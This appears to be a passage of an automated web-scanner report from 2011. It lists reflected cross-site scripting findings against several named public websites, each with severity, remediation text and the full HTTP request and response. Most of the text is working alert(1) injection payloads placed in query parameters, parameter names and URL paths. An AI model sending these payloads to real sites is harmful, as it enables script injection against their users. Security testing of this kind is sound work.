HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:41:39 GMT Server: Microsoft-IIS/6.0 Server: Summit X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-HTTPModule: Scout Media Excalibur v.6.24.1.5335 X-Streamed: from 192.168.20.181 in 427 ms Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/ Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/ Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/ Cache-Control: public, s-maxage=600 Expires: Wed, 02 Feb 2011 15:51:38 GMT Content-Type: text/html; charset=utf-8 Content-Length: 212188
<!-- An exception occurred. Described as: Incorrect syntax near '412'. The floating point value '956e390' is out of the range of computer representation (8 bytes).--><!DOCTYPE html PUBLIC "-// ...[SNIP]... <!-- function SeasonYearChange() { document.location.href='/a.z?s=73&p=9&c=4%00412f4'-alert(1)-'956e390f61d&pid=88&yr=' + $("#yr").get(0)[$("#yr").get(0).selectedIndex].value;} //--> ...[SNIP]...
1.164. http://recruiting.scout.com/a.z [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://recruiting.scout.com
Path:
/a.z
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 21eb1'-alert(1)-'67613be4156 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /a.z?s=73&p=9&c=4&pid=88&yr=2011&21eb1'-alert(1)-'67613be4156=1 HTTP/1.1 Host: recruiting.scout.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:42:45 GMT Server: Microsoft-IIS/6.0 Server: Scoutweb1 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-HTTPModule: Scout Media Excalibur v.6.24.1.5335 X-Streamed: from 192.168.20.181 in 367 ms Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/ Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/ Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/ Cache-Control: public, s-maxage=600 Expires: Wed, 02 Feb 2011 15:52:44 GMT Content-Type: text/html; charset=utf-8 Content-Length: 211233
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html> <head> <title>Scout.com: Football Recruiting</title> <meta http-eq ...[SNIP]... <!-- function SeasonYearChange() { document.location.href='/a.z?s=73&p=9&c=4&pid=88&21eb1'-alert(1)-'67613be4156=1&yr=' + $("#yr").get(0)[$("#yr").get(0).selectedIndex].value;} //--> ...[SNIP]...
The value of the frameName request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 46054'-alert(1)-'3516148de48 was submitted in the frameName parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the pageURL request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8e7a8'-alert(1)-'8af0a80e42e was submitted in the pageURL parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the ranreq request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0ddb'-alert(1)-'75dd4dca154 was submitted in the ranreq parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the lang request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b5be"><script>alert(1)</script>51b0587d24d was submitted in the lang parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /submit.php?type=1&lang=en7b5be"><script>alert(1)</script>51b0587d24d&url=refpage&title=refpage&tag=refpage&text=refpage HTTP/1.1 Host: sociallist.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.9.1 Date: Tue, 01 Feb 2011 14:32:42 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.14 Content-Length: 19498
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-type" content ...[SNIP]... <a href="http://sociallist.org/submit.php?type=1&lang=en7b5be"><script>alert(1)</script>51b0587d24d&url=refpage&title=refpage&tag=refpage&text=refpage"> ...[SNIP]...
1.169. http://sociallist.org/submit.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://sociallist.org
Path:
/submit.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c92e7"><script>alert(1)</script>c161344b8ce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /submit.php?c92e7"><script>alert(1)</script>c161344b8ce=1 HTTP/1.1 Host: sociallist.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.9.1 Date: Tue, 01 Feb 2011 14:32:39 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.14 Content-Length: 18868
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-type" content ...[SNIP]... <a href="http://sociallist.org/submit.php?c92e7"><script>alert(1)</script>c161344b8ce=1"> ...[SNIP]...
The value of the tag request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94680"><script>alert(1)</script>385c4aafbf was submitted in the tag parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /submit.php?type=1&lang=en&url=refpage&title=refpage&tag=refpage94680"><script>alert(1)</script>385c4aafbf&text=refpage HTTP/1.1 Host: sociallist.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.9.1 Date: Tue, 01 Feb 2011 14:32:44 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.14 Content-Length: 19488
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-type" content ...[SNIP]... <a href="http://sociallist.org/submit.php?type=1&lang=en&url=refpage&title=refpage&tag=refpage94680"><script>alert(1)</script>385c4aafbf&text=refpage"> ...[SNIP]...
The value of the text request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5bf26"><script>alert(1)</script>4d8458ad73a was submitted in the text parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /submit.php?type=1&lang=en&url=refpage&title=refpage&tag=refpage&text=refpage5bf26"><script>alert(1)</script>4d8458ad73a HTTP/1.1 Host: sociallist.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.9.1 Date: Tue, 01 Feb 2011 14:32:45 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.14 Content-Length: 19498
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-type" content ...[SNIP]... <a href="http://sociallist.org/submit.php?type=1&lang=en&url=refpage&title=refpage&tag=refpage&text=refpage5bf26"><script>alert(1)</script>4d8458ad73a"> ...[SNIP]...
The value of the title request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5df9"><script>alert(1)</script>6ca859d5791 was submitted in the title parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /submit.php?type=1&lang=en&url=refpage&title=refpagef5df9"><script>alert(1)</script>6ca859d5791&tag=refpage&text=refpage HTTP/1.1 Host: sociallist.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.9.1 Date: Tue, 01 Feb 2011 14:32:44 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.14 Content-Length: 19498
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-type" content ...[SNIP]... <a href="http://sociallist.org/submit.php?type=1&lang=en&url=refpage&title=refpagef5df9"><script>alert(1)</script>6ca859d5791&tag=refpage&text=refpage"> ...[SNIP]...
The value of the type request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fae34"><script>alert(1)</script>c10119c2686 was submitted in the type parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /submit.php?type=1fae34"><script>alert(1)</script>c10119c2686&lang=en&url=refpage&title=refpage&tag=refpage&text=refpage HTTP/1.1 Host: sociallist.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.9.1 Date: Tue, 01 Feb 2011 14:32:42 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.14 Content-Length: 19498
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-type" content ...[SNIP]... <a href="http://sociallist.org/submit.php?type=1fae34"><script>alert(1)</script>c10119c2686&lang=en&url=refpage&title=refpage&tag=refpage&text=refpage"> ...[SNIP]...
The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a978a"><script>alert(1)</script>2b441ed7164 was submitted in the url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /submit.php?type=1&lang=en&url=refpagea978a"><script>alert(1)</script>2b441ed7164&title=refpage&tag=refpage&text=refpage HTTP/1.1 Host: sociallist.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.9.1 Date: Tue, 01 Feb 2011 14:32:44 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.14 Content-Length: 19498
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-type" content ...[SNIP]... <a href="http://sociallist.org/submit.php?type=1&lang=en&url=refpagea978a"><script>alert(1)</script>2b441ed7164&title=refpage&tag=refpage&text=refpage"> ...[SNIP]...
The value of the ROIID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e5d61'%3balert(1)//83d5529551f was submitted in the ROIID parameter. This input was echoed as e5d61';alert(1)//83d5529551f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /track/track.aspx?ROIID=936138107000019e5d61'%3balert(1)//83d5529551f HTTP/1.1 Host: track.roiservice.com Proxy-Connection: keep-alive Referer: http://www.millenniumhotels.com/millenniumboston/index.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: msid938956107000029=06dd214c75b14fd39004a5e41502868d
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 15:42:42 GMT Server: Microsoft-IIS/6.0 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP NID PSA ADM OUR IND NAV COM" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: msid936138107000019e5d61';alert(1)//83d5529551f=ddc990c0fc744d2cbe0ff4ded6312952; domain=.roiservice.com; expires=Sun, 02-Feb-2031 15:42:42 GMT; path=/ Set-Cookie: GTT936138107000019e5d61';alert(1)//83d5529551f=ddc990c0fc744d2cbe0ff4ded6312952; domain=.roiservice.com; path=/ Cache-Control: private Content-Type: text/javascript; charset=utf-8 Content-Length: 1656
1.176. http://wp-superslider.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://wp-superslider.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ce46"><script>alert(1)</script>2b12960bb2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2ce46\"><script>alert(1)</script>2b12960bb2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?2ce46"><script>alert(1)</script>2b12960bb2=1 HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba1c7"><script>alert(1)</script>59b95746b00 was submitted in the REST URL parameter 1. This input was echoed as ba1c7\"><script>alert(1)</script>59b95746b00 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.phpba1c7"><script>alert(1)</script>59b95746b00 HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:23:47 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674627+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674628; expires=Thu, 02-Feb-2012 19:23:48 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:23:48 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53197
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 427c3"><script>alert(1)</script>6ae2ba26414 was submitted in the REST URL parameter 1. This input was echoed as 427c3\"><script>alert(1)</script>6ae2ba26414 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site427c3"><script>alert(1)</script>6ae2ba26414/wp-content/plugins/si-contact-form/captcha-secureimage/ctf_captcha.js HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:23:02 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674583+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674583; expires=Thu, 02-Feb-2012 19:23:03 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:23:03 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53392
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5400"><script>alert(1)</script>18ede8274ac was submitted in the REST URL parameter 2. This input was echoed as b5400\"><script>alert(1)</script>18ede8274ac in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-contentb5400"><script>alert(1)</script>18ede8274ac/plugins/si-contact-form/captcha-secureimage/ctf_captcha.js HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:23:04 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674584+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674585; expires=Thu, 02-Feb-2012 19:23:05 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:23:05 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53392
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29535"><script>alert(1)</script>bb1a33e1d72 was submitted in the REST URL parameter 3. This input was echoed as 29535\"><script>alert(1)</script>bb1a33e1d72 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins29535"><script>alert(1)</script>bb1a33e1d72/si-contact-form/captcha-secureimage/ctf_captcha.js HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:23:06 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674586+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674587; expires=Thu, 02-Feb-2012 19:23:07 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:23:07 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53392
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fcc9c"><script>alert(1)</script>406f3f1b80a was submitted in the REST URL parameter 4. This input was echoed as fcc9c\"><script>alert(1)</script>406f3f1b80a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/si-contact-formfcc9c"><script>alert(1)</script>406f3f1b80a/captcha-secureimage/ctf_captcha.js HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:23:08 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674588+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674588; expires=Thu, 02-Feb-2012 19:23:08 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:23:08 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53392
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21998"><script>alert(1)</script>61808997102 was submitted in the REST URL parameter 5. This input was echoed as 21998\"><script>alert(1)</script>61808997102 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/si-contact-form/captcha-secureimage21998"><script>alert(1)</script>61808997102/ctf_captcha.js HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:23:09 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674589+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674590; expires=Thu, 02-Feb-2012 19:23:10 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:23:10 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53391
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be147"><script>alert(1)</script>60a126f5ab0 was submitted in the REST URL parameter 6. This input was echoed as be147\"><script>alert(1)</script>60a126f5ab0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/si-contact-form/captcha-secureimage/ctf_captcha.jsbe147"><script>alert(1)</script>60a126f5ab0 HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:23:11 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674591+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674591; expires=Thu, 02-Feb-2012 19:23:11 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:23:11 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53392
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82727"><script>alert(1)</script>61afe33f333 was submitted in the REST URL parameter 1. This input was echoed as 82727\"><script>alert(1)</script>61afe33f333 in the application's response.
